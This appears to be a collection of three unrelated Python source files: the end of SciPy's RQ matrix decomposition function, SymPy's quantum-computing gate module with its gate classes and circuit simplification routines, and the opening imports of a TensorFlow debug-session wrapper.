Matrix to be decomposed
overwrite_a : boolean
Whether data in a is overwritten (may improve performance)
lwork : integer
Work array size, lwork >= a.shape[1]. If None or -1, an optimal size
is computed.
mode : {'full', 'r', 'economic'}
Determines what information is to be returned: either both Q and R
('full', default), only R ('r') or both Q and R but computed in
economy-size ('economic', see Notes).
Returns
-------
R : double array, shape (M, N)
Q : double or complex array, shape (M, M)
Raises LinAlgError if decomposition fails
Examples
--------
>>> from scipy import linalg
>>> from numpy import random, dot, allclose
>>> a = random.randn(6, 9)
>>> r, q = linalg.rq(a)
>>> allclose(a, dot(r, q))
True
>>> r.shape, q.shape
((6, 9), (9, 9))
>>> r2 = linalg.rq(a, mode='r')
>>> allclose(r, r2)
True
>>> r3, q3 = linalg.rq(a, mode='economic')
>>> r3.shape, q3.shape
((6, 6), (6, 9))
"""
if not mode in ['full', 'r', 'economic']:
raise ValueError(\
"Mode argument should be one of ['full', 'r', 'economic']")
a1 = asarray_chkfinite(a)
if len(a1.shape) != 2:
raise ValueError('expected matrix')
M, N = a1.shape
overwrite_a = overwrite_a or (_datacopied(a1, a))
gerqf, = get_lapack_funcs(('gerqf',), (a1,))
if lwork is None or lwork == -1:
# get optimal work array
rq, tau, work, info = gerqf(a1, lwork=-1, overwrite_a=1)
lwork = work[0].real.astype(numpy.int)
rq, tau, work, info = gerqf(a1, lwork=lwork, overwrite_a=overwrite_a)
if info < 0:
raise ValueError('illegal value in %d-th argument of internal gerqf'
% -info)
if not mode == 'economic' or N < M:
R = special_matrices.triu(rq, N-M)
else:
R = special_matrices.triu(rq[-M:, -M:])
if mode == 'r':
return R
if find_best_lapack_type((a1,))[0] in ('s', 'd'):
gor_un_grq, = get_lapack_funcs(('orgrq',), (rq,))
else:
gor_un_grq, = get_lapack_funcs(('ungrq',), (rq,))
if N < M:
# get optimal work array
Q, work, info = gor_un_grq(rq[-N:], tau, lwork=-1, overwrite_a=1)
lwork = work[0].real.astype(numpy.int)
Q, work, info = gor_un_grq(rq[-N:], tau, lwork=lwork, overwrite_a=1)
elif mode == 'economic':
# get optimal work array
Q, work, info = gor_un_grq(rq, tau, lwork=-1, overwrite_a=1)
lwork = work[0].real.astype(numpy.int)
Q, work, info = gor_un_grq(rq, tau, lwork=lwork, overwrite_a=1)
else:
rq1 = numpy.empty((N, N), dtype=rq.dtype)
rq1[-M:] = rq
# get optimal work array
Q, work, info = gor_un_grq(rq1, tau, lwork=-1, overwrite_a=1)
lwork = work[0].real.astype(numpy.int)
Q, work, info = gor_un_grq(rq1, tau, lwork=lwork, overwrite_a=1)
if info < 0:
raise ValueError("illegal value in %d-th argument of internal orgrq"
% -info)
return R, Q
|
|
"""An implementation of gates that act on qubits.
Gates are unitary operators that act on the space of qubits.
Medium Term Todo:
* Optimize Gate._apply_operators_Qubit to remove the creation of many
intermediate Qubit objects.
* Add commutation relationships to all operators and use this in gate_sort.
* Fix gate_sort and gate_simp.
* Get multi-target UGates plotting properly.
* Get UGate to work with either sympy/numpy matrices and output either
format. This should also use the matrix slots.
"""
from itertools import chain
import random
from sympy import Add, I, Integer, Matrix, Mul, Pow, sqrt, Tuple
from sympy.core.numbers import Number
from sympy.core.compatibility import is_sequence
from sympy.printing.pretty.stringpict import prettyForm, stringPict
from sympy.physics.quantum.anticommutator import AntiCommutator
from sympy.physics.quantum.commutator import Commutator
from sympy.physics.quantum.qexpr import QuantumError
from sympy.physics.quantum.hilbert import ComplexSpace
from sympy.physics.quantum.operator import (UnitaryOperator, Operator,
HermitianOperator)
from sympy.physics.quantum.matrixutils import matrix_tensor_product, matrix_eye
from sympy.physics.quantum.matrixcache import matrix_cache
from sympy.matrices.matrices import MatrixBase
__all__ = [
'Gate',
'CGate',
'UGate',
'OneQubitGate',
'TwoQubitGate',
'IdentityGate',
'HadamardGate',
'XGate',
'YGate',
'ZGate',
'TGate',
'PhaseGate',
'SwapGate',
'CNotGate',
# Aliased gate names
'CNOT',
'SWAP',
'H',
'X',
'Y',
'Z',
'T',
'S',
'Phase',
'normalized',
'gate_sort',
'gate_simp',
'random_circuit',
]
#-----------------------------------------------------------------------------
# Gate Super-Classes
#-----------------------------------------------------------------------------
_normalized = True
def normalized(normalize):
"""Should Hadamard gates be normalized by a 1/sqrt(2).
This is a global setting that can be used to simplify the look of various
expressions, by leaving of the leading 1/sqrt(2) of the Hadamard gate.
Parameters
----------
normalize : bool
Should the Hadamard gate include the 1/sqrt(2) normalization factor?
When True, the Hadamard gate will have the 1/sqrt(2). When False, the
Hadamard gate will not have this factor.
"""
global _normalized
_normalized = normalize
def _validate_targets_controls(tandc):
tandc = list(tandc)
# Check for integers
for bit in tandc:
if not bit.is_Integer:
raise TypeError('Integer expected, got: %r' % tandc[bit])
# Detect duplicates
if len(list(set(tandc))) != len(tandc):
raise QuantumError(
'Target/control qubits in a gate cannot be duplicated'
)
class Gate(UnitaryOperator):
"""Non-controlled unitary gate operator that acts on qubits.
This is a general abstract gate that needs to be subclassed to do anything
useful.
Parameters
----------
label : tuple, int
A list of the target qubits (as ints) that the gate will apply to.
Examples
--------
"""
_label_separator = ','
gate_name = u'G'
gate_name_latex = u'G'
#-------------------------------------------------------------------------
# Initialization/creation
#-------------------------------------------------------------------------
@classmethod
def _eval_args(cls, args):
args = Tuple(*UnitaryOperator._eval_args(args))
_validate_targets_controls(args)
return args
@classmethod
def _eval_hilbert_space(cls, args):
"""This returns the smallest possible Hilbert space."""
return ComplexSpace(2)**(max(args)+1)
#-------------------------------------------------------------------------
# Properties
#-------------------------------------------------------------------------
@property
def nqubits(self):
"""The total number of qubits this gate acts on.
For controlled gate subclasses this includes both target and control
qubits, so that, for examples the CNOT gate acts on 2 qubits.
"""
return len(self.targets)
@property
def min_qubits(self):
"""The minimum number of qubits this gate needs to act on."""
return max(self.targets)+1
@property
def targets(self):
"""A tuple of target qubits."""
return self.label
@property
def gate_name_plot(self):
return r'$%s$' % self.gate_name_latex
#-------------------------------------------------------------------------
# Gate methods
#-------------------------------------------------------------------------
def get_target_matrix(self, format='sympy'):
"""The matrix rep. of the target part of the gate.
Parameters
----------
format : str
The format string ('sympy','numpy', etc.)
"""
raise NotImplementedError('get_target_matrix is not implemented in Gate.')
#-------------------------------------------------------------------------
# Apply
#-------------------------------------------------------------------------
def _apply_operator_IntQubit(self, qubits, **options):
"""Redirect an apply from IntQubit to Qubit"""
return self._apply_operator_Qubit(qubits, **options)
def _apply_operator_Qubit(self, qubits, **options):
"""Apply this gate to a Qubit."""
# Check number of qubits this gate acts on.
if qubits.nqubits < self.min_qubits:
raise QuantumError(
'Gate needs a minimum of %r qubits to act on, got: %r' %\
(self.min_qubits, qubits.nqubits)
)
# If the controls are not met, just return
if isinstance(self, CGate):
if not self.eval_controls(qubits):
return qubits
targets = self.targets
target_matrix = self.get_target_matrix(format='sympy')
# Find which column of the target matrix this applies to.
column_index = 0
n = 1
for target in targets:
column_index += n*qubits[target]
n = n<<1
column = target_matrix[:,int(column_index)]
# Now apply each column element to the qubit.
result = 0
for index in range(column.rows):
# TODO: This can be optimized to reduce the number of Qubit
# creations. We should simply manipulate the raw list of qubit
# values and then build the new Qubit object once.
# Make a copy of the incoming qubits.
new_qubit = qubits.__class__(*qubits.args)
# Flip the bits that need to be flipped.
for bit in range(len(targets)):
if new_qubit[targets[bit]] != (index>>bit)&1:
new_qubit = new_qubit.flip(targets[bit])
# The value in that row and column times the flipped-bit qubit
# is the result for that part.
result += column[index]*new_qubit
return result
#-------------------------------------------------------------------------
# Represent
#-------------------------------------------------------------------------
def _represent_default_basis(self, **options):
return self._represent_ZGate(None, **options)
def _represent_ZGate(self, basis, **options):
format = options.get('format','sympy')
nqubits = options.get('nqubits',0)
if nqubits == 0:
raise QuantumError('The number of qubits must be given as nqubits.')
# Make sure we have enough qubits for the gate.
if nqubits < self.min_qubits:
raise QuantumError(
'The number of qubits %r is too small for the gate.' % nqubits
)
target_matrix = self.get_target_matrix(format)
targets = self.targets
if isinstance(self, CGate):
controls = self.controls
else:
controls = []
m = represent_zbasis(
controls, targets, target_matrix, nqubits, format
)
return m
#-------------------------------------------------------------------------
# Print methods
#-------------------------------------------------------------------------
def _print_contents(self, printer, *args):
label = self._print_label(printer, *args)
return '%s(%s)' % (self.gate_name, label)
def _print_contents_pretty(self, printer, *args):
a = stringPict(unicode(self.gate_name))
b = self._print_label_pretty(printer, *args)
return self._print_subscript_pretty(a, b)
def _print_contents_latex(self, printer, *args):
label = self._print_label(printer, *args)
return '%s_{%s}' % (self.gate_name_latex, label)
def plot_gate(self, axes, gate_idx, gate_grid, wire_grid):
raise NotImplementedError('plot_gate is not implemented.')
class CGate(Gate):
"""A general unitary gate with control qubits.
A general control gate applies a target gate to a set of targets if all
of the control qubits have a particular values (set by
``CGate.control_value``).
Parameters
----------
label : tuple
The label in this case has the form (controls, gate), where controls
is a tuple/list of control qubits (as ints) and gate is a ``Gate``
instance that is the target operator.
Examples
--------
"""
gate_name = u'C'
gate_name_latex = u'C'
# The values this class controls for.
control_value = Integer(1)
#-------------------------------------------------------------------------
# Initialization
#-------------------------------------------------------------------------
@classmethod
def _eval_args(cls, args):
# _eval_args has the right logic for the controls argument.
controls = args[0]
gate = args[1]
if not is_sequence(controls):
controls = (controls,)
controls = UnitaryOperator._eval_args(controls)
_validate_targets_controls(chain(controls,gate.targets))
return (Tuple(*controls), gate)
@classmethod
def _eval_hilbert_space(cls, args):
"""This returns the smallest possible Hilbert space."""
return ComplexSpace(2)**max(max(args[0])+1,args[1].min_qubits)
#-------------------------------------------------------------------------
# Properties
#-------------------------------------------------------------------------
@property
def nqubits(self):
"""The total number of qubits this gate acts on.
For controlled gate subclasses this includes both target and control
qubits, so that, for examples the CNOT gate acts on 2 qubits.
"""
return len(self.targets)+len(self.controls)
@property
def min_qubits(self):
"""The minimum number of qubits this gate needs to act on."""
return max(max(self.controls),max(self.targets))+1
@property
def targets(self):
"""A tuple of target qubits."""
return self.gate.targets
@property
def controls(self):
"""A tuple of control qubits."""
return tuple(self.label[0])
@property
def gate(self):
"""The non-controlled gate that will be applied to the targets."""
return self.label[1]
#-------------------------------------------------------------------------
# Gate methods
#-------------------------------------------------------------------------
def get_target_matrix(self, format='sympy'):
return self.gate.get_target_matrix(format)
def eval_controls(self, qubit):
"""Return True/False to indicate if the controls are satisfied."""
return all(qubit[bit]==self.control_value for bit in self.controls)
def decompose(self, **options):
"""Decompose the controlled gate into CNOT and single qubits gates."""
if len(self.controls) == 1:
c = self.controls[0]
t = self.gate.targets[0]
if isinstance(self.gate, YGate):
g1 = PhaseGate(t)
g2 = CNotGate(c, t)
g3 = PhaseGate(t)
g4 = ZGate(t)
return g1*g2*g3*g4
if isinstance(self.gate, ZGate):
g1 = HadamardGate(t)
g2 = CNotGate(c, t)
g3 = HadamardGate(t)
return g1*g2*g3
else:
return self
#-------------------------------------------------------------------------
# Print methods
#-------------------------------------------------------------------------
def _print_contents(self, printer, *args):
controls = self._print_sequence(self.controls, ',', printer, *args)
gate = printer._print(self.gate, *args)
return '%s((%s),%s)' %\
(self.gate_name, controls, gate)
def _print_contents_pretty(self, printer, *args):
controls = self._print_sequence_pretty(self.controls, ',', printer, *args)
gate = printer._print(self.gate)
gate_name = stringPict(unicode(self.gate_name))
first = self._print_subscript_pretty(gate_name, controls)
gate = self._print_parens_pretty(gate)
final = prettyForm(*first.right((gate)))
return final
def _print_contents_latex(self, printer, *args):
controls = self._print_sequence(self.controls, ',', printer, *args)
gate = printer._print(self.gate, *args)
return r'%s_{%s}{\left(%s\right)}' %\
(self.gate_name_latex, controls, gate)
def plot_gate(self, circ_plot, gate_idx):
min_wire = int(min(chain(self.controls, self.targets)))
max_wire = int(max(chain(self.controls, self.targets)))
circ_plot.control_line(gate_idx, min_wire, max_wire)
for c in self.controls:
circ_plot.control_point(gate_idx, int(c))
self.gate.plot_gate(circ_plot, gate_idx)
class UGate(Gate):
"""General gate specified by a set of targets and a target matrix.
Parameters
----------
label : tuple
A tuple of the form (targets, U), where targets is a tuple of the
target qubits and U is a unitary matrix with dimension of
len(targets).
"""
gate_name = u'U'
gate_name_latex = u'U'
#-------------------------------------------------------------------------
# Initialization
#-------------------------------------------------------------------------
@classmethod
def _eval_args(cls, args):
targets = args[0]
if not is_sequence(targets):
targets = (targets,)
targets = Gate._eval_args(targets)
_validate_targets_controls(targets)
mat = args[1]
if not isinstance(mat, MatrixBase):
raise TypeError('Matrix expected, got: %r' % mat)
dim = 2**len(targets)
if not all(dim == shape for shape in mat.shape):
raise IndexError(
'Number of targets must match the matrix size: %r %r' %\
(targets, mat)
)
return (targets, mat)
@classmethod
def _eval_hilbert_space(cls, args):
"""This returns the smallest possible Hilbert space."""
return ComplexSpace(2)**(max(args[0])+1)
#-------------------------------------------------------------------------
# Properties
#-------------------------------------------------------------------------
@property
def targets(self):
"""A tuple of target qubits."""
return tuple(self.label[0])
#-------------------------------------------------------------------------
# Gate methods
#-------------------------------------------------------------------------
def get_target_matrix(self, format='sympy'):
"""The matrix rep. of the target part of the gate.
Parameters
----------
format : str
The format string ('sympy','numpy', etc.)
"""
return self.label[1]
#-------------------------------------------------------------------------
# Print methods
#-------------------------------------------------------------------------
def _print_contents(self, printer, *args):
targets = self._print_targets(printer, *args)
return '%s(%s)' % (self.gate_name, targets)
def _print_contents_pretty(self, printer, *args):
targets = self._print_sequence_pretty(self.targets, ',', printer, *args)
gate_name = stringPict(unicode(self.gate_name))
return self._print_subscript_pretty(gate_name, targets)
def _print_contents_latex(self, printer, *args):
targets = self._print_sequence(self.targets, ',', printer, *args)
return r'%s_{%s}' % (self.gate_name_latex, targets)
def plot_gate(self, circ_plot, gate_idx):
circ_plot.one_qubit_box(
self.gate_name_plot,
gate_idx, int(self.targets[0])
)
class OneQubitGate(Gate):
"""A single qubit unitary gate base class."""
nqubits = Integer(1)
def plot_gate(self, circ_plot, gate_idx):
circ_plot.one_qubit_box(
self.gate_name_plot,
gate_idx, int(self.targets[0])
)
def _eval_commutator(self, other, **hints):
if isinstance(other, OneQubitGate):
if self.targets != other.targets or self.__class__ == other.__class__:
return Integer(0)
return Operator._eval_commutator(self, other, **hints)
def _eval_anticommutator(self, other, **hints):
if isinstance(other, OneQubitGate):
if self.targets != other.targets or self.__class__ == other.__class__:
return Integer(2)*self*other
return Operator._eval_anticommutator(self, other, **hints)
class TwoQubitGate(Gate):
"""A two qubit unitary gate base class."""
nqubits = Integer(2)
#-----------------------------------------------------------------------------
# Single Qubit Gates
#-----------------------------------------------------------------------------
class IdentityGate(OneQubitGate):
"""The single qubit identity gate.
Parameters
----------
target : int
The target qubit this gate will apply to.
Examples
--------
"""
gate_name = u'1'
gate_name_latex = u'1'
def get_target_matrix(self, format='sympy'):
return matrix_cache.get_matrix('eye2', format)
def _eval_commutator(self, other, **hints):
return Integer(0)
def _eval_anticommutator(self, other, **hints):
return Integer(2)*other
class HadamardGate(OneQubitGate):
"""The single qubit Hadamard gate.
Parameters
----------
target : int
The target qubit this gate will apply to.
Examples
--------
"""
gate_name = u'H'
gate_name_latex = u'H'
def get_target_matrix(self, format='sympy'):
if _normalized:
return matrix_cache.get_matrix('H', format)
else:
return matrix_cache.get_matrix('Hsqrt2', format)
def _eval_commutator_XGate(self, other, **hints):
return I*sqrt(2)*YGate(self.targets[0])
def _eval_commutator_YGate(self, other, **hints):
return I*sqrt(2)*(ZGate(self.targets[0])-XGate(self.targets[0]))
def _eval_commutator_ZGate(self, other, **hints):
return -I*sqrt(2)*YGate(self.targets[0])
def _eval_anticommutator_XGate(self, other, **hints):
return sqrt(2)*IdentityGate(self.targets[0])
def _eval_anticommutator_YGate(self, other, **hints):
return Integer(0)
def _eval_anticommutator_ZGate(self, other, **hints):
return sqrt(2)*IdentityGate(self.targets[0])
class XGate(HermitianOperator, OneQubitGate):
"""The single qubit X, or NOT, gate.
Parameters
----------
target : int
The target qubit this gate will apply to.
Examples
--------
"""
gate_name = u'X'
gate_name_latex = u'X'
def get_target_matrix(self, format='sympy'):
return matrix_cache.get_matrix('X', format)
def plot_gate(self, circ_plot, gate_idx):
circ_plot.not_point(
gate_idx, int(self.label[0])
)
def _eval_commutator_YGate(self, other, **hints):
return Integer(2)*I*ZGate(self.targets[0])
def _eval_anticommutator_XGate(self, other, **hints):
return Integer(2)*IdentityGate(self.targets[0])
def _eval_anticommutator_YGate(self, other, **hints):
return Integer(0)
def _eval_anticommutator_ZGate(self, other, **hints):
return Integer(0)
class YGate(HermitianOperator, OneQubitGate):
"""The single qubit Y gate.
Parameters
----------
target : int
The target qubit this gate will apply to.
Examples
--------
"""
gate_name = u'Y'
gate_name_latex = u'Y'
def get_target_matrix(self, format='sympy'):
return matrix_cache.get_matrix('Y', format)
def _eval_commutator_ZGate(self, other, **hints):
return Integer(2)*I*XGate(self.targets[0])
def _eval_anticommutator_YGate(self, other, **hints):
return Integer(2)*IdentityGate(self.targets[0])
def _eval_anticommutator_ZGate(self, other, **hints):
return Integer(0)
class ZGate(HermitianOperator, OneQubitGate):
"""The single qubit Z gate.
Parameters
----------
target : int
The target qubit this gate will apply to.
Examples
--------
"""
gate_name = u'Z'
gate_name_latex = u'Z'
def get_target_matrix(self, format='sympy'):
return matrix_cache.get_matrix('Z', format)
def _eval_commutator_XGate(self, other, **hints):
return Integer(2)*I*YGate(self.targets[0])
def _eval_anticommutator_YGate(self, other, **hints):
return Integer(0)
class PhaseGate(OneQubitGate):
"""The single qubit phase, or S, gate.
This gate rotates the phase of the state by pi/2 if the state is ``|1>`` and
does nothing if the state is ``|0>``.
Parameters
----------
target : int
The target qubit this gate will apply to.
Examples
--------
"""
gate_name = u'S'
gate_name_latex = u'S'
def get_target_matrix(self, format='sympy'):
return matrix_cache.get_matrix('S', format)
def _eval_commutator_ZGate(self, other, **hints):
return Integer(0)
def _eval_commutator_TGate(self, other, **hints):
return Integer(0)
class TGate(OneQubitGate):
"""The single qubit pi/8 gate.
This gate rotates the phase of the state by pi/4 if the state is ``|1>`` and
does nothing if the state is ``|0>``.
Parameters
----------
target : int
The target qubit this gate will apply to.
Examples
--------
"""
gate_name = u'T'
gate_name_latex = u'T'
def get_target_matrix(self, format='sympy'):
return matrix_cache.get_matrix('T', format)
def _eval_commutator_ZGate(self, other, **hints):
return Integer(0)
def _eval_commutator_PhaseGate(self, other, **hints):
return Integer(0)
# Aliases for gate names.
H = HadamardGate
X = XGate
Y = YGate
Z = ZGate
T = TGate
Phase = S = PhaseGate
#-----------------------------------------------------------------------------
# 2 Qubit Gates
#-----------------------------------------------------------------------------
class CNotGate(CGate, TwoQubitGate):
"""Two qubit controlled-NOT.
This gate performs the NOT or X gate on the target qubit if the control
qubits all have the value 1.
Parameters
----------
label : tuple
A tuple of the form (control, target).
Examples
--------
"""
gate_name = 'CNOT'
gate_name_latex = u'CNOT'
#-------------------------------------------------------------------------
# Initialization
#-------------------------------------------------------------------------
@classmethod
def _eval_args(cls, args):
args = Gate._eval_args(args)
return args
@classmethod
def _eval_hilbert_space(cls, args):
"""This returns the smallest possible Hilbert space."""
return ComplexSpace(2)**(max(args)+1)
#-------------------------------------------------------------------------
# Properties
#-------------------------------------------------------------------------
@property
def min_qubits(self):
"""The minimum number of qubits this gate needs to act on."""
return max(self.label)+1
@property
def targets(self):
"""A tuple of target qubits."""
return (self.label[1],)
@property
def controls(self):
"""A tuple of control qubits."""
return (self.label[0],)
@property
def gate(self):
"""The non-controlled gate that will be applied to the targets."""
return XGate(self.label[1])
#-------------------------------------------------------------------------
# Properties
#-------------------------------------------------------------------------
# The default printing of Gate works better than those of CGate, so we
# go around the overridden methods in CGate.
def _print_contents(self, printer, *args):
return Gate._print_contents(self, printer, *args)
def _print_contents_pretty(self, printer, *args):
return Gate._print_contents_pretty(self, printer, *args)
def _print_contents_latex(self, printer, *args):
return Gate._print_contents_latex(self, printer, *args)
#-------------------------------------------------------------------------
# Commutator/AntiCommutator
#-------------------------------------------------------------------------
def _eval_commutator_ZGate(self, other, **hints):
"""[CNOT(i, j), Z(i)] == 0."""
if self.controls[0] == other.targets[0]:
return Integer(0)
else:
raise NotImplementedError('Commutator not implemented: %r' % other)
def _eval_commutator_TGate(self, other, **hints):
"""[CNOT(i, j), T(i)] == 0."""
return self._eval_commutator_ZGate(other, **hints)
def _eval_commutator_PhaseGate(self, other, **hints):
"""[CNOT(i, j), S(i)] == 0."""
return self._eval_commutator_ZGate(other, **hints)
def _eval_commutator_XGate(self, other, **hints):
"""[CNOT(i, j), X(j)] == 0."""
if self.targets[0] == other.targets[0]:
return Integer(0)
else:
raise NotImplementedError('Commutator not implemented: %r' % other)
def _eval_commutator_CNotGate(self, other, **hints):
"""[CNOT(i, j), CNOT(i,k)] == 0."""
if self.controls[0] == other.controls[0]:
return Integer(0)
else:
raise NotImplementedError('Commutator not implemented: %r' % other)
class SwapGate(TwoQubitGate):
"""Two qubit SWAP gate.
This gate swap the values of the two qubits.
Parameters
----------
label : tuple
A tuple of the form (target1, target2).
Examples
--------
"""
gate_name = 'SWAP'
gate_name_latex = u'SWAP'
def get_target_matrix(self, format='sympy'):
return matrix_cache.get_matrix('SWAP', format)
def decompose(self, **options):
"""Decompose the SWAP gate into CNOT gates."""
i,j = self.targets[0], self.targets[1]
g1 = CNotGate(i, j)
g2 = CNotGate(j, i)
return g1*g2*g1
def plot_gate(self, circ_plot, gate_idx):
min_wire = int(min(self.targets))
max_wire = int(max(self.targets))
circ_plot.control_line(gate_idx, min_wire, max_wire)
circ_plot.swap_point(gate_idx, min_wire)
circ_plot.swap_point(gate_idx, max_wire)
def _represent_ZGate(self, basis, **options):
"""Represent the SWAP gate in the computational basis.
The following representation is used to compute this:
SWAP = |1><1|x|1><1| + |0><0|x|0><0| + |1><0|x|0><1| + |0><1|x|1><0|
"""
format = options.get('format', 'sympy')
targets = [int(t) for t in self.targets]
min_target = min(targets)
max_target = max(targets)
nqubits = options.get('nqubits',self.min_qubits)
op01 = matrix_cache.get_matrix('op01', format)
op10 = matrix_cache.get_matrix('op10', format)
op11 = matrix_cache.get_matrix('op11', format)
op00 = matrix_cache.get_matrix('op00', format)
eye2 = matrix_cache.get_matrix('eye2', format)
result = None
for i, j in ((op01,op10),(op10,op01),(op00,op00),(op11,op11)):
product = nqubits*[eye2]
product[nqubits-min_target-1] = i
product[nqubits-max_target-1] = j
new_result = matrix_tensor_product(*product)
if result is None:
result = new_result
else:
result = result + new_result
return result
# Aliases for gate names.
CNOT = CNotGate
SWAP = SwapGate
#-----------------------------------------------------------------------------
# Represent
#-----------------------------------------------------------------------------
def represent_zbasis(controls, targets, target_matrix, nqubits, format='sympy'):
"""Represent a gate with controls, targets and target_matrix.
This function does the low-level work of representing gates as matrices
in the standard computational basis (ZGate). Currently, we support two
main cases:
1. One target qubit and no control qubits.
2. One target qubits and multiple control qubits.
For the base of multiple controls, we use the following expression [1]:
1_{2**n} + (|1><1|)^{(n-1)} x (target-matrix - 1_{2})
Parameters
----------
controls : list, tuple
A sequence of control qubits.
targets : list, tuple
A sequence of target qubits.
target_matrix : sympy.Matrix, numpy.matrix, scipy.sparse
The matrix form of the transformation to be performed on the target
qubits. The format of this matrix must match that passed into
the `format` argument.
nqubits : int
The total number of qubits used for the representation.
format : str
The format of the final matrix ('sympy', 'numpy', 'scipy.sparse').
Examples
--------
References
----------
[1] http://www.johnlapeyre.com/qinf/qinf_html/node6.html.
"""
controls = [int(x) for x in controls]
targets = [int(x) for x in targets]
nqubits = int(nqubits)
# This checks for the format as well.
op11 = matrix_cache.get_matrix('op11', format)
eye2 = matrix_cache.get_matrix('eye2', format)
# Plain single qubit case
if len(controls) == 0 and len(targets) == 1:
product = []
bit = targets[0]
# Fill product with [I1,Gate,I2] such that the unitaries,
# I, cause the gate to be applied to the correct Qubit
if bit != nqubits-1:
product.append(matrix_eye(2**(nqubits-bit-1), format=format))
product.append(target_matrix)
if bit != 0:
product.append(matrix_eye(2**bit, format=format))
return matrix_tensor_product(*product)
# Single target, multiple controls.
elif len(targets) == 1 and len(controls) >= 1:
target = targets[0]
# Build the non-trivial part.
product2 = []
for i in range(nqubits):
product2.append(matrix_eye(2, format=format))
for control in controls:
product2[nqubits-1-control] = op11
product2[nqubits-1-target] = target_matrix - eye2
return matrix_eye(2**nqubits, format=format) +\
matrix_tensor_product(*product2)
# Multi-target, multi-control is not yet implemented.
else:
raise NotImplementedError(
'The representation of multi-target, multi-control gates '
'is not implemented.'
)
#-----------------------------------------------------------------------------
# Gate manipulation functions.
#-----------------------------------------------------------------------------
def gate_simp(circuit):
"""Simplifies gates symbolically
It first sorts gates using gate_sort. It then applies basic
simplification rules to the circuit, e.g., XGate**2 = Identity
"""
# Bubble sort out gates that commute.
circuit = gate_sort(circuit)
# Do simplifications by subing a simplification into the first element
# which can be simplified. We recursively call gate_simp with new circuit
# as input more simplifications exist.
if isinstance(circuit, Add):
return sum(gate_simp(t) for t in circuit.args)
elif isinstance(circuit, Mul):
circuit_args = circuit.args
elif isinstance(circuit, Pow):
b, e = circuit.as_base_exp()
circuit_args = (gate_simp(b)**e,)
else:
return circuit
# Iterate through each element in circuit, simplify if possible.
for i in xrange(len(circuit_args)):
# H,X,Y or Z squared is 1.
# T**2 = S, S**2 = Z
if isinstance(circuit_args[i], Pow):
if isinstance(circuit_args[i].base,
(HadamardGate, XGate, YGate, ZGate))\
and isinstance(circuit_args[i].exp, Number):
# Build a new circuit taking replacing the
# H,X,Y,Z squared with one.
newargs = (circuit_args[:i] +\
(circuit_args[i].base**(circuit_args[i].exp % 2),) +\
circuit_args[i+1:])
# Recursively simplify the new circuit.
circuit = gate_simp(Mul(*newargs))
break
elif isinstance(circuit_args[i].base, PhaseGate):
# Build a new circuit taking old circuit but splicing
# in simplification.
newargs = circuit_args[:i]
# Replace PhaseGate**2 with ZGate.
newargs = newargs + (ZGate(circuit_args[i].base.args[0])**\
(Integer(circuit_args[i].exp/2)), circuit_args[i].base**\
(circuit_args[i].exp % 2))
# Append the last elements.
newargs = newargs + circuit_args[i+1:]
# Recursively simplify the new circuit.
circuit = gate_simp(Mul(*newargs))
break
elif isinstance(circuit_args[i].base, TGate):
# Build a new circuit taking all the old elements.
newargs = circuit_args[:i]
# Put an Phasegate in place of any TGate**2.
newargs = newargs + (PhaseGate(circuit_args[i].base.args[0])**\
Integer(circuit_args[i].exp/2), circuit_args[i].base**\
(circuit_args[i].exp % 2))
# Append the last elements.
newargs = newargs + circuit_args[i+1:]
# Recursively simplify the new circuit.
circuit = gate_simp(Mul(*newargs))
break
return circuit
def gate_sort(circuit):
"""Sorts the gates while keeping track of commutation relations
This function uses a bubble sort to rearrange the order of gate
application. Keeps track of Quantum computations special commutation
relations (e.g. things that apply to the same Qubit do not commute with
each other)
circuit is the Mul of gates that are to be sorted.
"""
# Make sure we have an Add or Mul.
if isinstance(circuit, Add):
return sum(gate_sort(t) for t in circuit.args)
if isinstance(circuit, Pow):
return gate_sort(circuit.base)**circuit.exp
elif isinstance(circuit, Gate):
return circuit
if not isinstance(circuit, Mul):
return circuit
changes = True
while changes:
changes = False
circ_array = circuit.args
for i in xrange(len(circ_array)-1):
# Go through each element and switch ones that are in wrong order
if isinstance(circ_array[i], (Gate, Pow)) and\
isinstance(circ_array[i+1], (Gate, Pow)):
# If we have a Pow object, look at only the base
first_base, first_exp = circ_array[i].as_base_exp()
second_base, second_exp = circ_array[i+1].as_base_exp()
# Use sympy's hash based sorting. This is not mathematical
# sorting, but is rather based on comparing hashes of objects.
# See Basic.compare for details.
if first_base.compare(second_base) > 0:
if Commutator(first_base, second_base).doit() == 0:
new_args = (circuit.args[:i] + (circuit.args[i+1],) +\
(circuit.args[i],) + circuit.args[i+2:])
circuit = Mul(*new_args)
circ_array = circuit.args
changes = True
break
if AntiCommutator(first_base, second_base).doit() == 0:
new_args = (circuit.args[:i] + (circuit.args[i+1],) +\
(circuit.args[i],) + circuit.args[i+2:])
sign = Integer(-1)**(first_exp*second_exp)
circuit = sign*Mul(*new_args)
circ_array = circuit.args
changes = True
break
return circuit
#-----------------------------------------------------------------------------
# Utility functions
#-----------------------------------------------------------------------------
def random_circuit(ngates, nqubits, gate_space=(X, Y, Z, S, T, H, CNOT, SWAP)):
"""Return a random circuit of ngates and nqubits.
This uses an equally weighted sample of (X, Y, Z, S, T, H, CNOT, SWAP)
gates.
Parameters
----------
ngates : int
The number of gates in the circuit.
nqubits : int
The number of qubits in the circuit.
gate_space : tuple
A tuple of the gate classes that will be used in the circuit.
Repeating gate classes multiple times in this tuple will increase
the frequency they appear in the random circuit.
"""
qubit_space = range(nqubits)
result = []
for i in xrange(ngates):
g = random.choice(gate_space)
if g == CNotGate or g == SwapGate:
qubits = random.sample(qubit_space,2)
g = g(*qubits)
else:
qubit = random.choice(qubit_space)
g = g(qubit)
result.append(g)
return Mul(*result)
def zx_basis_transform(self, format='sympy'):
"""Transformation matrix from Z to X basis."""
return matrix_cache.get_matrix('ZX', format)
def zy_basis_transform(self, format='sympy'):
"""Transformation matrix from Z to Y basis."""
return matrix_cache.get_matrix('ZY', format)
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Framework of debug-wrapped sessions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import shutil
import tempfile
import threading
import numpy as np
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.wrappers import framework
